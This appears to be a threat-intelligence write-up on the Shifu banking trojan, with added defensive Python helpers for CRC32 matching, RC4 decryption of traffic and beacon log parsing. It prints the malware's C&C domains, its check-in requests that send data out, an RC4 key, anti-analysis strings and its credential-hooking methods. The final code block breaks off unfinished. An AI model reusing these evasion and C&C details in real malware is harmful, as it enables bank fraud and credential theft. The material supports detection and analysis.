A Look at Shifu – Behavior, Capabilities and Communications…
As part of our normal course of operations as a cyber threat intelligence provider, we monitor the cyber crime underground and provide analysis to our clients on new and emerging threats. As you can imagine, we naturally run into large quantities of malware on a daily basis. From time to time, we release findings to the public in the interest of informing the community around new threats and providing actionable analysis to support the hunt and kill missions. Below is a write up on the Shifu trojan – we hope that you find this useful and that it helps you better protect your organization from this threat.
Should you have any questions about the details in this blog, please do not hesitate to drop us a line and we will work to get you the answers that you need.
Key Points:
• Shifu is a novel malware family built using tactics, techniques and procedures (TTPs) from multiple malware families including Shiz, Zeus and possibly Dridex.
• Notable in Shifu is a custom application programming interface (API) that is used to control the various components of the malware and to report the result of each API call back to the attacker.
• Shifu installs httpd, a standalone Apache HTTP server, and uses it to handle communication with the attacker's command and control (C&C) server.
Known Targeted Entities…
Currently, targeting focuses largely on the UK and Japan. This does not mean that other geographies are not at risk from Shifu and its controllers.
The following is a list of targeted UK entities (we are continuing our attempts to retrieve a list of targeted entities for Japan):
- Adam & Company
- Allied Irish Bank (IBusiness banking)
- Bank of Scotland
- Barclays
- Clydesdale & Yorkshire Bank
- Coutts & Co.
- Danske Bank
- Halifax
- HSBC
- Lloyds Bank
- NatWest Online Banking
- Royal Bank of Scotland Digital Banking
- Santander
- Triodos Bank
- TSB Bank
- Ulster Bank
- Unity Trust Bank
- Yorkshire Building Society
Analysis of Representative Malware Sample
iSIGHT Partners analyzed numerous samples of the Shifu malware. The malware only recently acquired the name Shifu; earlier variants were referred to as "PowerAgent," after the Windows Registry value the malware creates for persistence, "IntelPowerAgent6."
The malware shares many similarities with other known banking Trojans such as Zeus, Dridex and Shiz. Like many malware families created after the emergence of Zeus, there is a blending of tactics, techniques and procedures (TTPs) for multiple malware families. Each of these similarities will be examined in detail.
The malware uses several methods to evade analysis and frustrate researchers. When first launched, it uses a loader to drop, install and patch the core payload prior to execution. If the payload is run as a standalone application it appears corrupted, because the loader patches several parts of it during installation. The malware can also blacklist applications such as other bots, anti-virus (AV) products and research tools; it identifies blacklisted and whitelisted applications by cyclic redundancy check (CRC32) hashes of their names, as we cover later.
In addition to that blacklist, the loader has a separate application blacklist that causes it to end execution immediately if a listed application is detected. The loader also computes a CRC hash of itself and, if the hash matches a hard-coded value, bypasses all virtual machine (VM) detection routines. This check is probably a testing aid: the hash corresponds to the name of a development copy, so that copy does not terminate when run in a VM. The loader likewise checks whether a SmartCard reader is attached and, if one is detected, bypasses the remaining VM detection routines, presumably because a SmartCard reader suggests a physical machine rather than a VM.
Shifu uses several more CRC hash lists to decide which branch of functionality to execute. Among the lists and hashes the malware checks are:
• Web browsers in which, if found, it hooks the Winsock APIs to monitor network traffic
• Specific domains and/or hashes that initiate C&C communications
• The name/hash of httpd (the standalone Apache HTTP server)
• Point-of-sale (POS) process names and hashes of likely related applications
• Bitcoin wallets
Although Shifu identifies security products and analysis tools by CRC hash, it also carries a plain-text list of AV vendor names. Finding one of these does not terminate the malware; the check runs only before any data is posted to the attacker's command and control (C&C) server, presumably so the result can be reported with the check-in:
Vendor | Vendor | Vendor
---|---|---
AVAST Avast | Data Fellows – F-Secure | Panda Software
Avg | Doctor Web | rising
Avira | Eset – Nod | Softed – ViGUARD
Bitdefender | G Data | Sophos
ComodoGroup | KasperskyLab – protected | Symantec
Coranti | Microsoft Antimalware | TrendMicro
VBA32 | Network Associates- TVD | Zone Labs – ZoneAlarm
Two components effectively make up the initial Shifu binary: a loader and a DLL (main payload). The loader is responsible for performing all of the anti-VM, anti-analysis and anti-sandbox checks. If all of the checks pass, the loader will decompress, patch and inject the core DLL into the shell process. Querying the following Windows registry key identifies the shell process:
• HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"Shell"
After querying the registry key, the loader attempts to inject the patched DLL in the shell process. Significantly, the DLL itself is in a corrupted state after decompression and requires the loader to patch it before injection into the shell process. The patching process is as follows:
• Patch MZ, PE header
• Patch entry point relative virtual address (RVA)
• Patch import table RVA
• Decode imports
• Obfuscate all imported APIs
Static Analysis
Shifu is heavily obfuscated, and initial examination of the payload revealed little of interest aside from a possible custom packer used by the malware called “divederail” with a compile time of Aug. 6, 2015.
After successfully patching and examining the core DLL, the following project folder and debug (PDB) path were revealed:
• Z:\coding\project\main\payload\payload.x86.pdb
During our analysis, we uncovered many different modules that the malware uses, including the following:
Source file | Source file | Source file
---|---|---
payload.cpp | src\fuckup.cpp | src\system.cpp
src\av.cpp | src\ipc.cpp | src\killos.cpp
src\bot.cpp | src\keylog.cpp | src\seh.cpp
src\certs.cpp | src\knock.cpp | src\debugmsg.cpp
src\cmdinject.cpp | src\logsend.cpp | src\str.cpp
src\cmdload.cpp | src\mitm.cpp | src\fileio.cpp
src\cmdmitm.cpp | src\msghook.cpp | src\memory.cpp
src\cmdupdate.cpp | src\proclist.cpp | src\hashes.cpp
src\commands.cpp | src\rootkit.cpp | src\jpeg.cpp
src\config.cpp | src\sniffer.cpp | src\inet.cpp
src\dga.cpp | src\systems.cpp | src\dgalib.cpp
src\sysinfo.cpp | src\virtkeys.cpp | src\osver.cpp
src\dllinject.cpp | src\vnc.cpp |
The core payload has a plethora of capabilities and possible modules it can download for added functionality. The malware re-uses some functionality from Zeus, Dridex and Shiz. This data is highlighted below:
Zeus Functions:
• tellerplus|bancline|fidelity|micrsolv|bankman|vanity|episys|jack henry|cruisenet|gplusmain|silverlake|v48d0250s1
(These are the same process checks seen in Zeus. If Shifu detects any of these strings, it takes a screenshot, posts key log data and sends system information to the attacker's C&C server.)
• Additionally, some of the anti-analysis and anti-VM techniques are consistent with previous Zeus variants.
Shiz Functions:
• Shifu uses a modified version of the Shiz DGA. The variables and methods used in the generation of the domains have changed.
Dridex Functions:
• Although not an explicit function, Shifu uses an XML configuration file similar to that of the Dridex malware (aka Bugat).
Shifu is able to accept a range of commands, from updating the bot to destroying the operating system (OS). The following are the commands that Shifu supports:
Command | Command | Command
---|---|---
inject | active_bc | deactive_sk
update | deactive_bc | docfind
load | wipe_cookies | block
kill_os | active_sk | mitm_mod
mitm_script | |
In addition to being able to use the above commands, Shifu uses a custom API for controlling the bot and reporting results of the API execution back to the C&C server. The following is a table containing these API functions:
Function | Function | Function
---|---|---
AvInit | FileSaveTo | PayloadRoutine
AvProcessResult | FileToBase64 | PrintScreenJpeg
BotEnableAutorunAndProtect | FileWrite | ProcessCommand
BotFixAutorunPolicy | FuckupJP | ProcListInjectAll
BotIsResident | GetLastErrorWinInet | ReportOKCmd
BotNameInitialize | HashHash | RkSetHidden
BotProtectFile | HashToStr | RootkitInit
CertgrabProccessSystemStores | HttpSendRequestExtended | SehInitialize
CertHandlerContinue | IeFixCDX | SendAccount
CertsFixValidateCA | InetDownloadFile | SnifferInit
CertsSetHooks | InetHostCheckConnection | StartHttpd
CheckFileMD5 | InetIsHostOnline | StartKnockRoutine
CheckProcessesFromZeusGOV | InetSendRequestPOST | StrGetTextBetween
CheckResidentStateThread | IpcInitServerThread | StrUnicodeToAscii
CommandDoInject | IpcListen | SysCloseHandle
CommandDoLoad | IpcProcessPipeStr | SysEnableExeAutoRun
CommandDoMitmMod | IpcProcessSendWEbLog | SysExecuteFile
CommandDoMitmScript | IpcProcessSetSocksPort | SysGetModuleHandlePin
CommandDoUpdate | IpcProcessSetVncPort | SysGetNiceCompName
ConfigCheckPlugins | IpcSendSystem | SysGetNiceUserName
ConfigForceRead | IpcSendWebSniffLog | SysGetProcessIntegrityLevel
ConfigInit | KeyLogAddToLog | SysGetUserProfileDir
ConfigLoad | KeyLogGetLastCaption | SysInfoNetstat
ConfigProcessPacked | KeyLogInit | SysInfoNetUser
ConfigSave | KnockDoKnock | sysInfoTaskMgr
ConfigWatch | KnockRoutine | SystInitializeLowSecAttrs
ConnectToNewClient | LogSendData | SysInjectDllToProcessById32
DomainCheckSign | LogSendSystemLogEx | SysIsCompInDomain
DomainCheckThread | LogSendWebLog | SysIsKernelLoaded
DomainDownloadKey | MemAlloc | SysIsProcessActiveByCRC32
DomainValidateKeyStr | MemProtect | SysIsTerminalSessionProcess
EntryPoint | MemRealloc | SysIsWow64
ExportCertificates | MitmInit | SysKillOs
FileCryptDecryptRC4 | MitmWriteConfigPhp | SysLoadLibraryAndCallOrdinal32
FileDelete | MitmWriteListenAddrs | SysStartThread
FileDeleteDir | MsghookInit | SystemsCheckCryptoWallets
FileDeleteSubDir | MyPFXImportCertStore | SystemCheckDirs
FileGetSize | OsGetVersion | SysTerminateProcessByPid
FileGetTemp | PatchChromeCertCheck | TopLevelIExceptionHandler
FileLoadFrom | Patchcrptui | VkIsGoodWindow
FileMakeDir | Patcrsaenhnew | VkMageMicroScrshot
FileRead | PayloadResidentRoutine | VNCIsVNC
Anti-Analysis, Anti-VM & Anti-Sandbox
Many malware families detect whether they are running in a VM or sandbox, or are being analyzed or debugged. Shifu takes this to an extreme, with dozens of checks and branching behavior that ranges from terminating itself to reporting back to its C&C server. The following sections list the checks Shifu performs, including the CRC32 hashes it compares against the names of running processes. CRC32 is not reversible: the process names behind the bare hashes can only be recovered by hashing candidate names and comparing, and because CRC32 collisions are easy to find, a match obtained that way is not conclusive. We have therefore not attempted reverse lookups:
Terminate Immediately
Strings checked:
• SANDBOX
• FORTINET
• sbiedll.dll
• dbghelp.dll
• api_log.dll
• dir_watch.dll
• pstorec.dll
• c:\analysis\sandboxstarter.exe
• c:\analysis
• c:\insidetm
• c:\window\system32\drivers\vmmouse.sys
• c:\window\system32\drivers\vmhgfs.sys
• c:\windows\system32\drivers\vmboxmouse.sys
• \system32\rstrui.exe
CRC32 hashes checked against running process names (plain-text names unknown; values reproduced as printed, with leading zeros dropped):
CRC32 | CRC32 | CRC32 | CRC32
---|---|---|---
278CDF58 | 6E9AD238 | 33495995 |
99DD4432 | E90ACC42 | 68684B33 |
1F413C1F | 4231F0AD | B4364A7A |
6D3323D9 | D20981E0 | 9305F80D |
3BFFF885 | CCEA165E | C4AAED42 |
64340DCE | FCA978AC | 14078D5B |
63C54474 | 46FA37FB | 7EDF4F6 |
2B05B17D | EEBF618A | D3B48D5B |
F725433E | 6AAAE60 | 332FD095 |
77AE10F7 | 5BA9B1FE | 2D6A6921 |
CE7D304E | 3CE2BEF3 | 2AAA273B |
AF2015F2 | A945E459 | 777BE06C |
31FD677C | 877A154B | E84126B8 |
8662660 | 5676DCEA | 6C6E6A74 |
0A84E285 | 1BF6717E | 11520499 | 6A9F12C2
3C164BED | 9DA652F5 | 52832504 | E5700683
C19DADCE | 818B9822 | 7FF8A7C4 | 124F656
552D4ED4 | 48A752AD | 75159163 | AAE6CF31
Additional checks the malware makes to determine branching functionality:
• Skip VM checks: a SmartCard reader is found; the loader's own CRC matches 5217027 (the development-copy check described above); or the system is 64-bit
• Hook Winsock API (traffic monitor): firefox.exe, iexplore.exe and chrome.exe (CRC32 values 84E35F10, C3DDC6D5 and 9C1D0D0E as listed)
• Restart internal Apache HTTP server: 82D037E3
• Connect to C&C: if a connection to one of the listed domains succeeds, the malware connects to the C&C
Branching Functionality to Take Screenshot, Grab System Information and Capture Key Log Data to Send to C&C Server
Strings checked (the Zeus process list from above plus banking-software and POS names):
• Omikron\MCSign
• MCSIGN
• ELBALOCAL
• HBPData\hbp.profile
• HBP
• ELBA5\ELBA_data
• tellerplus
• bancline
• fidelity
• micrsolv
• bankman
• vanity
• episys
• jack henry
• cruisenet
• gplusmain
• silverlake
• v48d0250s1
• pos.exe
• bank.exe
• POS
CRC32 hashes checked (plain-text names unknown; values reproduced as printed, with leading zeros dropped and an OCR "S" read as "5"; 208AG703, 2DE62E2CC and 6B4737017 are not valid eight-digit hex values as printed and are probably transcription errors):
CRC32 | CRC32 | CRC32 | CRC32 | CRC32 | CRC32
---|---|---|---|---|---
D5AFE347 | 1520C6FC | 8D73940 | 6164D621 | 7F006276 |
3CD2F52B | EB3E9524 | 7EA56DD4 | 9E514577 | 1112E894 |
D0393D82 | 16B88982 | D697181B | 48D0E729 | 8A431577 |
F33B69C9 | 900F48CB | 432A30F6 | 40C1472D | 6A367AC | C7F12F81
600FE875 | 2FE5DDDB | FEC95559 | EBBA8818 | 9330B1BC | 482DD2A1
C0507C47 | 7F383A3D | CA8F2447 | 1A8549EE | D4D1DABB | 1F8A1A34
C25C84B6 | DB4FF76A | 4399C284 | A5E4363A | EB821910 | D1C1A6F1
CE5D9477 | 1008DDC9 | 920F9997 | 52DDCFE9 | 530DFC96 | 61774F83
F10C467C | 9B282310 | 7C934BFA | EAE4D38E | 9C5305AC | B6A73D4C
EDB8ED84 | 147A1679 | 7314615B | 9CEC32CD | B0BEBB22 | 637690A0
B7F66707 | 72C1148A | 1EC38064 | 9B0FF98 | 2DE62E2CC | 630380BD
D9CFAAFC | 811FE2F6 | E1D08BD3 | DAA840B0 | 7D292D5C | 34A3856D
F4DD7D00 | B35A1FBF | CED3FE41 | 2E76EDDA | D81477DF | D9C7E1E
6B4737017 | 5465EE3B | 57FF7496 | EE3F8F14 | FB98997A | 61B3C004
C3C39C30 | 78D00514 | FE5AD73D | CAD75136 | 61B3C004 | B4B3079
9CD1C89B | 89FEE818 | 38AF4595 | 6166CBFE | 4D50DB3A | 28F258E8
7D0208BC | 22BCF394 | C5955648 | 21E4F6E1 | 9F44E2AD | D00D57A1
AE21F4BD | A5EF5232 | DC940E90 | 254BF12 | 1F8F32DD | 8AA8ADD1
373DD31D | 28E223B0 | 28EFE770 | 45B5186D | CC52CBB0 | D35B8E8B
B19BE433 | A649FA98 | 5FD4AF15 | B49A7001 | 6194AEDD | DB5B130C
C2803376 | 3DCF12DB | 6F39D5E5 | E58E420F | A1B089CF | ADE4FF12
542A88E0 | C8D635E6 | 851F2672 | B48B2BE6 | CF3FE156 | 87D7BE37
8ECCE46 | 21E0C754 | AEA032F4 | 8B34C6B4 | 6863CBC4 | AF407D3F
1557F882 | E8A0F232 | 226A31 | 54E18969 | 208AG703 | 9EAA7E6D
CD7007CE | DBF32FA8 | 3F8C2811 | CF18FB77 | 2A819D48 | 9427565
AD1A170A | BC90AA40 | 6DCA34D9 | 3EDDD0CC | 6AA08F8 | A301D995
B035BEAD | 7E682F49 | DD63FE4B | F761556A | 4FDDDDBA | D5202EDF
71DEA7D8 | 83ED7E1E | CBCA91DA | C2666E5E | E9D4AA1C | 35121417
EEDAEB84 | EC18D835 | 1FF114CE | 20F676DD | FA429238 | 7250472
68B0A2D2 | E7868E6A | 831BB9C2 | 1E6CC84E | 23E559EE | 46729516
16B3C140 | A053B931 | EBFB0CC8 | FEA3B580 | 5C5424CD | 7439D83C
5FD22F11 | 2A77EE37 | 7C0A2C03 | 89961D2B | 72F9117D | 9A0ABBDD
117C8602 | BEC4AE1B | B317125A | 6D38C83E | 4941148D | C47610CC
B8132034 | 7C0A2C03 | 5ACE07E5 | 161C6399 | 2CC8BE52 | 1177CB80
CD47F86A | 56A6914D | F17E253B | 5BA8998F | E05FC686 | 368506FF
C04B8655 | | | | |
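Because CRC32 cannot be inverted, the practical way to put names to the bare hashes in the terminate-immediately table and the screenshot/keylog table above is to hash candidate process names and compare. The following Python helper is added here as an example; it is not code from iSIGHT Partners or from the Shifu sample. The sample's exact normalization (case, ANSI versus UTF-16 string, CRC polynomial) is not documented on this page, so the helper tries several common variants and reports a hit under any of them; the hash subset embedded in it is copied from the tables above, and the candidate names are our own guesses at common analysis-tool process names.

```python
import zlib

# Subset of the CRC32 values copied from the tables above: the first rows of
# the terminate-immediately table and the pos.exe/bank.exe row of the
# screenshot/keylog branch table. Extend with the full tables as needed.
TERMINATE_HASHES = {0x278CDF58, 0x6E9AD238, 0x33495995, 0x99DD4432, 0xE90ACC42}
SCREENSHOT_HASHES = {0xD5AFE347, 0x1520C6FC, 0x08D73940, 0x6164D621, 0x7F006276}

# Constructed candidate list: names of common sandbox, VM and analysis tools.
# These are guesses to try against the tables, not names recovered from the sample.
CANDIDATE_NAMES = [
    "vmtoolsd.exe", "vboxservice.exe", "vboxtray.exe", "vmwareuser.exe",
    "wireshark.exe", "procmon.exe", "procexp.exe", "ollydbg.exe", "idaq.exe",
    "windbg.exe", "x64dbg.exe", "fiddler.exe", "sbiedll.dll", "pos.exe",
]


def crc32_variants(name: str) -> dict:
    """CRC32 (IEEE polynomial, as computed by zlib) of a name under the
    normalizations a Win32 process-name check commonly applies. Which one
    Shifu uses is an assumption, so every variant is computed."""
    forms = {
        "ascii": name.encode("utf-8"),
        "ascii_lower": name.lower().encode("utf-8"),
        "ascii_upper": name.upper().encode("utf-8"),
        "utf16le": name.encode("utf-16-le"),
        "utf16le_lower": name.lower().encode("utf-16-le"),
        "utf16le_upper": name.upper().encode("utf-16-le"),
    }
    return {variant: zlib.crc32(data) & 0xFFFFFFFF for variant, data in forms.items()}


def match_candidates(candidates, hashes) -> list:
    """Return (name, variant, crc32) for every candidate whose CRC32 under some
    variant appears in the hash set. A hit is a lead, not proof: CRC32 collides."""
    hits = []
    for name in candidates:
        for variant, value in crc32_variants(name).items():
            if value in hashes:
                hits.append((name, variant, value))
    return hits


def scan_tables(candidates=CANDIDATE_NAMES) -> dict:
    """Run the candidates against both tables; each key names the branch a hit would trigger."""
    return {
        "terminate": match_candidates(candidates, TERMINATE_HASHES),
        "screenshot_keylog": match_candidates(candidates, SCREENSHOT_HASHES),
    }


if __name__ == "__main__":
    for branch, hits in scan_tables().items():
        print(branch, hits or "no candidate matched")
```

Feed it a larger wordlist (process names harvested from your own sandbox images are the most productive source) and treat any hit as a hypothesis to confirm against the sample, since a 32-bit checksum will eventually match an unrelated name.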
In addition to these searching and branching functions, Shifu searches the infected machine for Bitcoin-related files in an attempt to steal them and upload them to the C&C server. It looks for the following files:
• bitcoin\wallet.dat
• litecoin\wallet.dat
If the Bitcoin files are found, the data is saved in a new file prior to uploading to the attacker’s C&C. The following file names will be used for the captured data:
• btc_wallet.dat
• ltc_wallet.dat
Shifu also contains a list of processes to monitor on the infected machine. The aim is to stop downloaded binaries from running: the malware hooks the URLDownloadToFile API in urlmon.dll and corrupts a blacklisted download by renaming it to "infected.exx." The following snippet illustrates the rename to "infected.exx," the processes to monitor and the hooked API function:
During installation, the loader queries a number of settings, including the computer name, user name, install date and system-drive volume serial number, and concatenates them into a single string. If that string contains any of the sub-strings hard-coded in the binary, the loader sets a control flag, which likely causes the C&C server to handle the bot differently (presumably flagging machines whose names suggest finance or management roles). The hard-coded sub-strings follow; several are Russian words or fragments of words:
• TRADE
• BOSS: similar in pronunciation to the Russian "босс"
• CAPO: may refer to the head of a branch of an organized crime syndicate, although the transliteration is slightly off, as the "c" would be a hard "k" sound in Russian
• ROSPIL: RosPil is a non-profit community project dedicated to combating abuse and is associated with the political activist Alexey Navalny; "ROS" may refer to "Rossiya" (Russia)
• FINOTDEL: Russian for "financial department"
• OPER: likely an abbreviation of "operation"
• MANAGE
• MONEY
• FINAN: likely an abbreviation of derivatives of "finance"
• DIREK: possibly an abbreviation of the Russian word for "director"
• KASS: "cashbox" or "cash desk"
• CASH
• ACCOUNT
• BANK
• BUH: possibly the first syllable of the Russian word for "accounting"
Shifu is also designed to harvest plaintext authentication exchanges (AUTHINFO) from the infected machine's outbound traffic. Specifically, it searches captured buffers for the following command strings, which are the FTP, POP3 and NNTP authentication commands:
• USER
• PASS
• ACCT
• AUTHINFO USER
• AUTHINFO PASS
To capture this data, the malware hooks the following API functions; hooking CryptEncrypt and SSL_Write lets it read the data before it is encrypted:
• send
• WSASend
• CryptEncrypt
• SSL_Write
If the connection is on port 110 or 31595, the captured credentials are saved as e-mail credentials; otherwise they are saved as FTP credentials.
In addition to grabbing credentials, the malware exports any certificates in the Windows certificate stores. Each captured certificate is saved as <n>_cert.pfx with a companion <n>_info.txt (e.g. 1_cert.pfx and 1_info.txt), with n incremented for each certificate. The following strings show the hard-coded path formats and the API function used to enumerate the stores:
• %s%s\%u_cert.pfx
• %s%s\%u_info.txt
• CertEnumSystemStore
Behavior on Infected System (Dynamic Analysis)
Upon initial execution, Shifu behaves similarly to many malware families: it copies itself under a randomized name into the user's %ProgramData% folder, then executes the loader in a separate process, which patches the main payload DLL and injects it into the shell process, explorer.exe.
In parallel to the launch, the malware will create a BAT file with deletion commands for the original binary. This has become the standard for much of the recent e-crime malware. Shifu also creates two different registry keys used for persistence and to survive a reboot. One of the registry entries is a RUN key to startup on reboot of the infected system.
The malware also starts a keylogger and begins beaconing to the attacker's C&C domain. The initial domain is hard-coded, but if the connection repeatedly fails, Shifu falls back to its DGA, a modified adaptation of the Shiz DGA. Several other files are created on disk as well. The following artifacts were observed after launching the malware:
• C:\%ProgramData%\d04dj0886b.exe
(Copy of the original binary)
• C:\%AppData%\Local\lld7D53.tmp.bat
(Deletion script)
• C:\%AppData%\Local\Temp\2d17e659d34601689591
(Text file with location of copied binary)
• C:\%AppData%\a8ee54f4\sysinfo.txt
(Collected information on running process on the infected machine)
• C:\%AppData%\a8ee54f4
(Key log data)
Registry Modifications & Persistence Method
• Key: HKCU\Software\Microsoft\Windows\2d17e6
• Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IntelPowerAgent6
o We have also observed different IntelPowerAgent numbers such as two, three, four or five.
Command and Control
Shifu contains a hard-coded URL for initial contact but also has a DGA to fall back on if the main C&C is offline. The DGA is modeled after Shiz but uses slightly different parameters for generating the domains. All communications following a successful connection use Secure Sockets Layer (SSL). See the following for one of the more recent SSL certificates, which has already been blacklisted:
The bot reports key information back to the C&C, including the result of each custom API call. Initial communications go to the hard-coded C&C, followed by DGA domains if that fails. Shifu encrypts its network communications with RC4. Notably, the key in the samples analyzed by iSIGHT Partners is the default RC4 key shipped with the Crypto library the malware uses, which further suggests the malware is still under development. The observed key is:
• a7zoSTHljZylEx4o3mJ2eqIdsEguKC15KnyQdfx4RTc5sjH
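The fact that the samples use plain RC4 with the default key above invites an obvious check on captured traffic: decrypt a POST body with that key and see whether plausible form-encoded text falls out. The following Python block is added here as an example; it is not code from iSIGHT Partners or from the Shifu sample. It implements RC4 and that check. The assumption that the POST body is a bare RC4 stream under this key, with no additional encoding and no per-session key, is ours, and the knock string used as sample plaintext is constructed on the model of the KnockBuffer check-in shown in the next section rather than taken from a capture.

```python
from typing import Optional

# RC4 key reported above for the analyzed samples (the Crypto library default).
SHIFU_RC4_KEY = b"a7zoSTHljZylEx4o3mJ2eqIdsEguKC15KnyQdfx4RTc5sjH"


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key-scheduling algorithm followed by the keystream generator.
    Encryption and decryption are the same XOR operation."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):                         # KSA
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                             # PRGA
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def looks_like_form_text(data: bytes, threshold: float = 0.95) -> bool:
    """Heuristic for judging a decryption attempt: URL-form-encoded check-in
    data should be almost entirely printable ASCII."""
    if not data:
        return False
    printable = sum(1 for b in data if 0x20 <= b < 0x7F or b in b"\r\n\t")
    return printable / len(data) >= threshold


def try_known_key(body: bytes, key: bytes = SHIFU_RC4_KEY) -> Optional[bytes]:
    """Decrypt a captured POST body with the known key and return the plaintext
    only if it passes the text heuristic; None means wrong key or not bare RC4."""
    plain = rc4(key, body)
    return plain if looks_like_form_text(plain) else None


# Constructed sample: a knock modelled on the KnockBuffer format, encrypted with
# the key above to stand in for a captured POST body (not real traffic).
SAMPLE_KNOCK = (b"botid=ADMINISTRATOR!MIR!FB950325&ver=1.537&up=347&os=2300"
                b"&ltime=%2b5&token=0&cn=a3&av=&dmn=")
SAMPLE_BODY = rc4(SHIFU_RC4_KEY, SAMPLE_KNOCK)


if __name__ == "__main__":
    print(len(SAMPLE_BODY), "byte body ->", try_known_key(SAMPLE_BODY))
```

Run try_known_key over the bodies of POSTs to the C&C paths seen above; a None result on real traffic means the operators have changed the key or wrapped the stream in something else, which is itself a useful signal that the sample has moved on from this development build.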
The following are some of the observed hard-coded domains and DGA domains:
• noyokoya-info.chu.jp
• eboduftazce-ru.com
• adtejoyo1377.tk
• fat.uk-fags.top
• urkaelt.info (DGA)
• nqqxqdg.info (DGA)
• fvffynt.info (DGA)
• njkyhle.info (DGA)
• oaoyorw.info (DGA)
• raemscf.info (DGA)
• pbchjln.info (DGA)
• bgnqado.info (DGA)
The following is an example POST made by the malware if it is successful in achieving a connection with the C&C:
POST https://eboduftazce-ru.com/news/userlogin.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: https://www1.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.1; Windows NT 5.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: eboduftazce-ru.com
Content-Length: 92
Cache-Control: no-cache
After the initial POST, the malware will perform a check-in with the following GET request:
GET /logs/dbg.php?msg=W3NyY1xib3QuY3BwOkJvdElzUmVzaWRlbnQ6MTcxXVsweGViMDsweDdjY10gQm90SXNSZXNpZGVudCByZXR1cm5lZCBGQUxTRQo= HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: noyokoya-info.chu.jp
Connection: Keep-Alive
The "msg" parameter is plain Base64 (not RC4-encrypted); decoded, it reads: [src\bot.cpp:BotIsResident:171][0xeb0;0x7cc] BotIsResident returned FALSE
Shifu sends many different check-ins of this kind. Each reports the execution result of a custom API function: after the bot calls a function, the result is sent back to the C&C. The following are decoded examples of "msg" check-ins:
• [:BotIsResident:153][0xef8;0xbe0] MutexName = 2d17e659d346, hMutex = 0x000000ec, GetLastError() = 0x000000b7
• [:BotNameInitialize:388][0x6e4;0x960] BotName: ADMINISTRATOR!MIR!FB950325
• [:KnockDoKnock:108][0x6e4;0x960] KnockBuffer: botid=ADMINISTRATOR!MIR!FB950325&ver=1.537&up=347&os=2300&ltime=%2b5&token=0&cn=a3&av=&dmn=
• [:HttpSendRequestExtended:116][0x6e4;0x960] break; GetLastErrorWinInet: ERROR_INTERNET_CANNOT_CONNECT
• [:GetLastErrorWinInet:127][0x6e4;0x960] break; 00000000
• [:InetSendRequestPOST:249][0x6e4;0x960] break; GetLastErrorWinInet: (null)
• [:KnockDoKnock:175][0x6e4;0x960] KnockDoKnock <=
• [:ProcListInjectAll:325][0x6e4;0x968] First time inject in: HEdit.exe [0x00000b04]
• [:BotIsResident:153][0xb04;0x9b0] MutexName = 2d17e659d346, hMutex = 0x000000d4, GetLastError() = 0x000000b7
• [:ProcListInjectAll:325][0x6e4;0x968] First time inject in: notepad++.exe [0x0000089c]
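The dbg.php check-ins above are easy to turn into a triage aid: the msg parameter is plain Base64, and the decoded string has a fixed shape, [file:function:line][0xA;0xB] message, with the file part empty in some builds. The following Python block is added here as an example; it is not code from iSIGHT Partners or from the Shifu sample. It decodes the GET request shown above into fields and then scans a short constructed list of request lines the way a proxy-log search would. Treating the two bracketed hex values as process and thread IDs is our assumption; the page does not label them.

```python
import base64
import re
from typing import List, Optional
from urllib.parse import parse_qs, urlsplit

# Shape of the decoded debug message, e.g.
#   [src\bot.cpp:BotIsResident:171][0xeb0;0x7cc] BotIsResident returned FALSE
# The file part is empty in some check-ins ("[:KnockDoKnock:108]..."), so it
# may be zero-length. Naming the hex values pid/tid is an assumption.
_MSG_RE = re.compile(
    r"^\[(?P<file>[^\]:]*):(?P<func>\w+):(?P<line>\d+)\]"
    r"\[0x(?P<pid>[0-9a-fA-F]+);0x(?P<tid>[0-9a-fA-F]+)\]\s*(?P<message>.*)$",
    re.DOTALL,
)


def decode_dbg_msg(msg_b64: str) -> dict:
    """Base64-decode a dbg.php msg value and split it into fields.
    Returns only {'raw': ...} when the text does not match the known shape."""
    raw = base64.b64decode(msg_b64).decode("latin-1").rstrip("\r\n")
    m = _MSG_RE.match(raw)
    if not m:
        return {"raw": raw}
    return {
        "raw": raw,
        "file": m["file"],
        "func": m["func"],
        "line": int(m["line"]),
        "pid": int(m["pid"], 16),
        "tid": int(m["tid"], 16),
        "message": m["message"],
    }


def parse_request_line(request_line: str) -> Optional[dict]:
    """Handle one HTTP request line ('GET /logs/dbg.php?msg=... HTTP/1.1').
    Returns the decoded check-in, or None if the line is not a dbg.php beacon."""
    parts = request_line.split()
    if len(parts) < 2:
        return None
    url = urlsplit(parts[1])
    if not url.path.endswith("/dbg.php"):
        return None
    msg = parse_qs(url.query).get("msg")
    if not msg:
        return None
    # parse_qs turns '+' into ' '; restore it in case the bot did not
    # URL-encode the Base64 alphabet.
    return decode_dbg_msg(msg[0].replace(" ", "+"))


def scan_requests(lines: List[str]) -> List[dict]:
    """Return decoded check-ins for every dbg.php beacon in a list of request lines."""
    hits = []
    for line in lines:
        parsed = parse_request_line(line)
        if parsed is not None:
            hits.append(parsed)
    return hits


# Constructed request lines: the first is the beacon shown above, the second
# wraps a constructed KnockDoKnock message in the same format, the third is
# unrelated traffic.
SAMPLE_REQUESTS = [
    "GET /logs/dbg.php?msg=W3NyY1xib3QuY3BwOkJvdElzUmVzaWRlbnQ6MTcxXVsweGViMDsweDdjY10g"
    "Qm90SXNSZXNpZGVudCByZXR1cm5lZCBGQUxTRQo= HTTP/1.1",
    "GET /logs/dbg.php?msg="
    + base64.b64encode(b"[:KnockDoKnock:175][0x6e4;0x960] KnockDoKnock <=\n").decode()
    + " HTTP/1.1",
    "GET /index.html HTTP/1.1",
]


if __name__ == "__main__":
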